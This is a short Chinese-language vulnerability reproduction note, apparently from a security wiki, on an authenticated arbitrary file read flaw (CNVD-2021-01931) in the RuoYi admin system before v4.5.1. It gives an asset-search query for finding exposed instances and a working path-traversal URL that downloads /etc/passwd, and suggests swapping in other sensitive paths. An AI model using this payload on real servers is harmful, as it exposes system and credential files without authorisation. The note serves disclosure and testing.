跳转至

若依管理系统 后台任意文件读取 CNVD-2021-01931

漏洞描述

若依管理系统是基于SpringBoot的权限管理系统,登录后台后可以读取服务器上的任意文件

漏洞影响

RuoYi < v4.5.1

网络测绘

app="若依-管理系统"

漏洞复现

登录后台后访问 Url

/common/download/resource?resource=/profile/../../../../etc/passwd

img

访问后会下载文件 /etc/passwd

img

可以使用Burp抓包改变 /etc/passwd 为其他文件路径获取敏感信息

img

img

在新版本的修复中添加了过滤

img